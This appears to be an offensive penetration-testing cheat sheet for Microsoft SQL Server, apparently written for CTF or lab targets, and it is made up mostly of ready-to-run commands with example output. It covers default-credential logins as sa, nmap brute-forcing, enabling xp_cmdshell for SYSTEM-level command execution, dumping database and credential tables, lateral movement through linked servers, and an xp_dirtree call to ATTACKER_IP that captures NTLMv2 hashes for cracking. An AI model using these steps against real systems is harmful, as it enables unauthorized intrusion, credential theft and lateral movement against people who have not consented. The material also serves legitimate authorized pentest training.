MSSQL (1433)
Try default creds
sa with blank/weak password — Default SA account
impacket-mssqlclient sa:password@$IP
Example Output
impacket-mssqlclient sa:sa@10.10.10.5
[*] Encryption required
[*] ENVCHANGE(DATABASE): Old: master, New: master
SQL> SELECT @@version;
Microsoft SQL Server 2019
Common: sa:sa, sa:password, sa:sa123
Nmap MSSQL scripts
Info, brute, xp_cmdshell — Quick overview
nmap --script ms-sql-* -p 1433 $IP
Example Output
nmap --script ms-sql-* -p 1433 10.10.10.5
| ms-sql-info:
| Version: 14.0.1000.169 (SQL Server 2017)
| Instance: MSSQLSERVER
| ms-sql-brute:
| sa:sa = Success
Enable xp_cmdshell
After login as sa — Enables OS command execution
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Example Output
1> EXEC sp_configure 'show advanced options', 1;
2> RECONFIGURE;
3> EXEC sp_configure 'xp_cmdshell', 1;
4> RECONFIGURE;
5> EXEC xp_cmdshell 'whoami';
nt authority\system
Execute commands
Run system commands — RCE via database
EXEC xp_cmdshell 'whoami';
Example Output
EXEC xp_cmdshell 'whoami';
nt authority\system
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\flag.txt';
flag{sql_rce_ftw}
(Full command execution as SYSTEM)
Enum databases
List all databases — Find interesting data
SELECT name FROM master.sys.databases;
Example Output
SQL> SELECT name FROM sys.databases;
master
tempdb
model
msdb
webapp
HRDatabase
SQL> USE HRDatabase;
SQL> SELECT name FROM sysobjects WHERE xtype='U';
employees
credentials
salaries
Linked servers
Pivot to other servers — Lateral movement via DB links
SELECT * FROM openquery("linkedserver", 'SELECT 1');
Example Output
SELECT * FROM sys.servers;
srv_name: DBPROD01
srv_name: HRDB
EXEC ('xp_cmdshell ''whoami''') AT [DBPROD01];
corp\dbadmin
(Lateral movement through linked SQL servers)
Capture hash (responder)
Trigger SMB auth to your machine — Capture NTLMv2 hash
EXEC xp_dirtree '\\ATTACKER_IP\share';
Example Output
On attacker: responder -I tun0
On MSSQL: EXEC xp_dirtree '\\10.10.14.2\share';
Responder captures:
[SMB] NTLMv2 Hash: sa::CORP:abc123...
(Crack with hashcat -m 5600)